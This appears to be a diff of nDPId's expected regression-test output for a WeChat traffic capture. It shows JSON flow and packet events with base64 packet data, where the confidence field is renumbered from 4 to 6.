00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":997,"source":"wechat.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167650311,"flow_last_seen":1492167650311,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1492167650311,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":60562,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":997,"source":"wechat.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":1,"flow_last_seen":1492167650311,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":75,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":75,"pkt_l4_len":41,"thread_ts_msec":1492167650311,"pkt":"8IQvSpdgeJKcD6iOCABFAAA916xAAEAR3k3AqAFnwKgB\/uySADUAKTCBKzkBAAABAAAAAAAAA3NzbAdnc3RhdGljA2NvbQAAAQAB"} 
-00772{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":997,"source":"wechat.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167650311,"flow_last_seen":1492167650311,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1492167650311,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":60562,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"ssl.gstatic.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00772{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":997,"source":"wechat.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167650311,"flow_last_seen":1492167650311,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1492167650311,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":60562,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"ssl.gstatic.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
00692{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":998,"source":"wechat.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":2,"flow_last_seen":1492167650345,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":234,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":234,"pkt_l4_len":200,"thread_ts_msec":1492167650345,"pkt":"eJKcD6iO8IQvSpdgCABFoADcAABAAEARtLvAqAH+wKgBZwA17JIAyGqeKzmBgAABAAEABAAEA3NzbAdnc3RhdGljA2NvbQAAAQABwAwAAQABAAAAHQAErNkXQ8AQAAIAAQACif4ADQNuczEGZ29vZ2xlwBjAEAACAAEAAon+AAYDbnM0wEHAEAACAAEAAon+AAYDbnMywEHAEAACAAEAAon+AAYDbnMzwEHAPQABAAEABTcbAATY7yAKwGgAAQABAAUtSQAE2O8iCsB6AAEAAQAFLUkABNjvJArAVgABAAEABS1JAATY7yYK"} -00789{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":998,"source":"wechat.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1492167650311,"flow_last_seen":1492167650345,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":192,"flow_tot_l4_payload_len":225,"flow_avg_l4_payload_len":112,"midstream":0,"thread_ts_msec":1492167650345,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":60562,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"ssl.gstatic.com","num_queries":1,"num_answers":9,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"172.217.23.67"}} 
+00789{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":998,"source":"wechat.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1492167650311,"flow_last_seen":1492167650345,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":192,"flow_tot_l4_payload_len":225,"flow_avg_l4_payload_len":112,"midstream":0,"thread_ts_msec":1492167650345,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":60562,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"ssl.gstatic.com","num_queries":1,"num_answers":9,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"172.217.23.67"}} 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":999,"source":"wechat.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167650348,"flow_last_seen":1492167650348,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1492167650348,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"172.217.23.67","src_port":35601,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02246{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":999,"source":"wechat.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":1,"flow_last_seen":1492167650348,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1492167650348,"pkt":"8IQvSpdgeJKcD6iOCABFAAVibiVAAEARQTrAqAFnrNkXQ4sRAbsFTiZlDSoBZwIONIO7UTAzNQGbgwNlLywtCSgLtCegAQAEQ0hMTx0AAABQQUQAIgEAAFNOSQAxAQAAU1RLAGsBAABWRVIAbwEAAENDUwB\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\/cQ8zfwllNkC+Y3GQAAABDQzIwQ2hyb21lLzU3LjAuMjk4Ny4xMzMgTGludXggeDg2XzY0Jc6XFWD7G7yXYXhVaoxdywAAAABYNTA5AAAQAAEAAAAeAAAA4qvwWAAAAABQ8MfjcV\/rNPz9nE7SSiHC6cDht5RKlsv0JChHgsKm0olGM4pgTHU2HYUvFhtNkOqQx\/75FAQP87Et+xOmGXIhZAAAAAEAAABDMjU1wgnkHLidnM3CCeQcuJ2czT2t9HxBefiRQAt7kKmuees8hQEA9eDJxrTnigGUXAfpWeAkSroNTkBs4scsx1Ra2LSNreNDFvpSDuqq6UeKpHg6NTM40g2RnXl5QzirTperKCTKzWwn+4\/bmuO2uGlriSPr4ExcTigYtlruN8fxdgnsCAuRhi2\/JFjFnbJqpKvDwpzJerd7H8C9zsxPzgMehsK4\/vItkCcZuwJmgaicPHLBf9M3RGKygCyV25zBdoSYTv7XUf5XBhgAAPAAAABgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"} 
-00760{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":999,"source":"wechat.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167650348,"flow_last_seen":1492167650348,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1492167650348,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"172.217.23.67","src_port":35601,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"ssl.gstatic.com","user_agent":"Chrome\/57.0.2987.133 Linux x86_64"}} +00760{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":999,"source":"wechat.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167650348,"flow_last_seen":1492167650348,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1492167650348,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"172.217.23.67","src_port":35601,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"ssl.gstatic.com","user_agent":"Chrome\/57.0.2987.133 Linux x86_64"}} 
00922{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1000,"source":"wechat.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":2,"flow_last_seen":1492167650348,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":400,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":400,"pkt_l4_len":366,"thread_ts_msec":1492167650348,"pkt":"8IQvSpdgeJKcD6iOCABFAAGCbiZAAEARRRnAqAFnrNkXQ4sRAbsBbnP9DSoBZwIONIO7UTAzNQLoUPe6\/kTOTlflPotTtybyc+JAmHNEvZwUaT+Y9MqSJDNXVlUHwBVN0wAQzobHU4rvOkVihYNG2ScjXRicw6QFTtMMe25DwzQ7F0UKP\/Y\/8HMbQmw9b+v7cjBNs8yLamuYyeUaQ6lA73AshAIuQPhL6IslIuIHWs+l0MLo2wd57CZSUFbeEQQGDWtD8b5mwEuaZ88hm8yA3WeZQ9Zu4UUro5Belh+M9DB8RCMbVDEQZk6oJR+FSwF3TriZCorpIzSRESc2crvu7FP1Tb9g0NyoL87e9cFlDFVypNQfdhNO+iEyVuMUtOGb6OQn1vrWvB\/icrLc4DopKhApNyBIG\/+MQmYuPalP+mCA4FXxaPeMi1RdjyuuqxJb39HK+6wmJsCzWDR6cvDTk6ywHmETP0AOjEu+QTifJk6chcMbgKmp0ErfBPvocLYD7Yj8Qw2lL48a1tEWZIz4lw=="} 02264{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1001,"source":"wechat.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":3,"flow_last_seen":1492167650401,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1492167650401,"pkt":"eJKcD6iO8IQvSpdgCABFoAViAABAADcRt7+s2RdDwKgBZwG7ixEFTkCsBPCmO80d\/CW5IJoqjbn6lzjr5TC1v3d2foeU3jLNcA4IAV35th92JTinR3E92La4uW3lsByHG3R1axVDDHGrIc2Dhs2S+7aBzkyVbwcuUK77hYdmfJ4TJuEFhTaYjceo9r51oYeJqOHOCc1BBmB5E+A58P\/H55fRg4dxRA9v1f2aVQ6I67HK4M7mS7147fzZ170E12rNhRLBsPAWwZ8U93ZWKjAcVK9waq7ihKZ\/GTyfNPuOCQnhcxCFRMVEx2xx65NSFauaw3a1qVgRV428j6Bchcyom0cvPgxBbWJUmObxkeqmQAFmTPCN6igcJnamWF5CRIXtlRtvIVi8G3Rds0EdWXNYvxaTSkwCziFaIH6mAaz9hCwjxATLUAdqd1Yo+wN5ikpGmpiBzh3Coj125lb7YXMKgdIF\/8K12iKaeICQ1ArpMEt9vvWxk35P363XmPN9SjUjvFqh8rl+ETiuGHzQwTYDZUwFRT8Tnc90FuuWkSHrjLuI78eE0u2MPArYDWbkXnAkM9f\/B1mpEGpwrQCQA0PHuwaHNDaEcqfk+htDhYfF2k76y25VNuFHeOfHnAe8W\/L6MSq0NvvJdxpclRqAM5S2hcBrDwho6FgiBa0XuPrQx
61q\/3nmcTSWb0DXXos+FWaLGj1Jg4cyk4xSeKoZfxTTY8qOxPxWcSNcXXGMVMwz3NtJzwB28A6uPq8NBF+APnNiUzkLELf20sskbghw4Wvw2P5GvZ6Z0iUqrAzGSGc0IroovL34w3TMmjBnTPzAWKnwYJxIrcFH65r\/43AXULA7mwVKw7TuryWaAn8PVofDMn5VL+m8Bc4anaE3270Gx7DXXa3CWGylYl6IhspD51Ji7UqD6pJpDanmkxF7QRS0mZz7M+VCAuE5+TvKpba5WKwmCrXKMkHXnBfHSx4yC\/BngUmyj5AqU\/35FBtHK2MhZhT3uv3ixGib\/DhROgxNj\/fCIDmyLmZy6LuI15IWBQr2uiGWD15jLW9srpQ3r\/cpXrjFWrIOILP7BDqFX16AVMtIyhn8QUmpyMBzWR3rPBVnAwwCQUSi7lOuHYSBa2JAApapl8ibPeq+IESORJ2WC1jpiGlKVsyKHvCUxM4DB9CDGl+VMCLfBwTUsv9jC9A0oISxfI+skno\/pMiMhfE+1+tVpq0kVbytQk5I14sgZgoXLliJYkFCOr3ikDyMImPkBDegikF\/nhKUricS6KkRKOBVEDYofUgm6hebzs7TAwbIX0LHGrieMSNYdiZ\/RaP9BKZ7WUS7z8Jvlw3DtdXYHHGY\/9m62j8jgUA89FYp2sdoaRFheoQUmxEE6EpSZHWMo5+AT1rvxDTcNLYyAF\/NKlyP79gaAWae04vlwFQ4Bupkoby3AV8qNrlb42pc54gLBwr2\/V8SfP1Jf8GHKLnbnMMGzz8c8g08IQe\/1e7EH9oyogw0WeUU2ddyxaRPwa4eLAdObHTP\/jn7fsHAYVorRI56TLQ62d12KS2GZw3\/dElBm43NGOyNU1Hp381LUrTlDOWD2CkkP1QCRN+zezQnIAdftR9GtZfdliGgi4n+DRQuugUUjAENUiyLbjua9o3CfXKyGh5RlHt3r219Xp7bzpU2Sa3x2tOlotON5hkk2pmORaeO3NrbIHwpGOzFl20\/4Mhk6xhdUZeHJoEN7V1+kqNLH9CANDu7wpMSMlhqJfpnckBvaCh9BXX3VOJErUyDwJ\/yEG1ZNKGdvcDhAfCDrZsIbxElU8wBdoFg5g3GjSgWUZyHIUdESjz3nA05zyGh0UQ5UNTBZNmAzAGEZvPJPDUf"} 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1009,"source":"wechat.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":2,"flow_last_seen":1492167654504,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167654504,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0DsBAAEAGBoXAqAFny82XotNaAbub+DW+SvgsEIARAOUK7AAAAQEICgAx4GBFrgFX"} 
00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1022,"source":"wechat.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167669545,"flow_last_seen":1492167669545,"flow_idle_time":200000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":0,"thread_ts_msec":1492167669545,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.255","src_port":138,"dst_port":138,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00731{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1022,"source":"wechat.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":1,"flow_last_seen":1492167669545,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":254,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":254,"pkt_l4_len":220,"thread_ts_msec":1492167669545,"pkt":"\/\/\/\/\/\/\/\/0CeIF3AECABFoADwPUUAAIARd2TAqAFkwKgB\/wCKAIoA3H9oEQ7+\/cCoAWQAigDGAAAgRUhFSkVQRkdFQkVPRU9FSkNORkFFRENBQ0FDQUNBQUEAIEFCQUNGUEZQRU5GREVDRkNFUEZIRkRFRkZQRlBBQ0FCAP9TTUIlAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQAALAAAAAAAAAAAAOgDAAAAAAAAAAAsAFYAAwABAAEAAgA9AFxNQUlMU0xPVFxCUk9XU0UADACguw0AV09SS0dST1VQAAAAAAAAAAMKABAAgP4HAABHSU9WQU5OSS1QQwA="} -00769{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1022,"source":"wechat.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167669545,"flow_last_seen":1492167669545,"flow_idle_time":200000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":0,"thread_ts_msec":1492167669545,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.255","src_port":138,"dst_port":138,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": 
{"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}} +00769{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1022,"source":"wechat.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167669545,"flow_last_seen":1492167669545,"flow_idle_time":200000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":0,"thread_ts_msec":1492167669545,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.255","src_port":138,"dst_port":138,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}} 00446{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1031,"source":"wechat.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":2,"flow_last_seen":1492167690433,"flow_idle_time":620000,"pkt_oversize":false,"pkt_caplen":50,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":38,"pkt_len":50,"pkt_l4_len":12,"thread_ts_msec":1492167690433,"pkt":"AQBeAAAB8IQvSpdgCABGoAAkj9oAAAEC8bHAqAH+4AAAAZQEAAARZOybAAAAAAIAAAA="} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1045,"source":"wechat.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167695237,"flow_last_seen":1492167695237,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167695237,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54117,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1045,"source":"wechat.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":1,"flow_last_seen":1492167695237,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167695237,"pkt":"8IQvSpdgeJKcD6iOCABFAAA8M9xAAEAG4WDAqAFny82XotNlAbtEgzv7AAAAAKACchBSeAAAAgQFtAQCCAoAMggnAAAAAAEDAwc="} 
@@ -302,52 +302,50 @@ 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1046,"source":"wechat.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":1,"flow_last_seen":1492167695488,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167695488,"pkt":"8IQvSpdgeJKcD6iOCABFAAA8xuRAAEAGTljAqAFny82XotNmAbsIrs6CAAAAAKACchD7hQAAAgQFtAQCCAoAMghmAAAAAAEDAwc="} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1051,"source":"wechat.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":2,"flow_last_seen":1492167695562,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167695562,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8AABAACwGKJ3LzZeiwKgBZwG702WgJJlmRIM7\/KASN8ga\/wAAAgQFoAQCCApF0vJmADIIJwEDAwc="} 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1052,"source":"wechat.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":3,"flow_last_seen":1492167695562,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167695562,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0M91AAEAG4WfAqAFny82XotNlAbtEgzv8oCSZZ4AQAOWASQAAAQEICgAyCHhF0vJm"} 
-00844{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1053,"source":"wechat.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167695237,"flow_last_seen":1492167695562,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1492167695562,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54117,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00844{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1053,"source":"wechat.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167695237,"flow_last_seen":1492167695562,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1492167695562,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54117,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 
00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1054,"source":"wechat.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":2,"flow_last_seen":1492167695854,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167695854,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8AABAAC0GJ53LzZeiwKgBZwG702aaLHzgCK7Og6ASN8jmSwAAAgQFoAQCCApF0vKlADIIZgEDAwc="} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1055,"source":"wechat.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":3,"flow_last_seen":1492167695854,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167695854,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0xuVAAEAGTl\/AqAFny82XotNmAbsIrs6Dmix84YAQAOVLjAAAAQEICgAyCMFF0vKl"} -00901{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1057,"source":"wechat.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167695237,"flow_last_seen":1492167695891,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1492167695891,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54117,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} 
-01435{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1059,"source":"wechat.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167695237,"flow_last_seen":1492167695891,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":3094,"flow_avg_l4_payload_len":386,"midstream":0,"thread_ts_msec":1492167695891,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54117,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}} 
-00844{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1070,"source":"wechat.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167695488,"flow_last_seen":1492167696636,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1492167696636,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54118,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": 